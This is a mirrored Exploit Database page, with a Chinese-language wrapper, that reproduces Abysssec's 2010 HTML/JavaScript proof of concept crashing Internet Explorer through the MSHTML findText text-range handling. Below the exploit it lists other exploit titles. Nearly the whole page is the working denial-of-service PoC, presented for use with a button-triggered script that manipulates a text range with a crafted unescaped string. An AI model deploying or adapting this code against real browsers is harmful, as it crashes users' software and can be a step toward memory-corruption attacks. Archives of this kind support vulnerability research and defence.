Microsoft Internet Explorer – MSHTML Findtext Processing

Exploit Database
10 阅读

作者： Abysssec

日期： 2010-09-27
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/15122/

<html>
<body>
<input type="button" value="Crachme!" onclick="Search()"/>
<inputtype="text" value="Abysssec" id="Abysssec">&lt;/textarea&gt;

<script type="text/javascript">
function Search(){
var textinput= document.getElementById("Abysssec");

var textRange = textinput.createTextRange();
textRange.findText(unescape("%u4141"),-1);
textRange.select(document.getElementById('d'));
document.body.appendChild(textinput);
}
</script>
<p id="p">Abysssec</p>
http://www.exploit-db.com/moaub-27-microsoft-internet-explorer-mshtml-findtext-processing-issue/
</body>
</html>
</p>
</body>
</html>

last Exploits
Microsoft Internet Explorer – MSHTML Findtext Processing的更多信息

Baumer VeriSens Application Suite 2.6.2 – Buffer Overflow (PoC)：
Opera / Mozilla Firefox 3.6 – Long String Crash：
Freeware Advanced Audio Coder (FAAC) 1.28 – Denial of Service：
IBM Lotus Domino LDAP – Bind Request Remote Code Execution：
Camtron CMNC-200 IP Camera – Denial of Service：
Wireshark – DIAMETER Dissector Denial of Service：
Secure Notepad Private Notes 3.0.3 – Denial of Service (PoC)：
Core FTP LE 2.2 – Path Field Local Buffer Overflow (PoC)：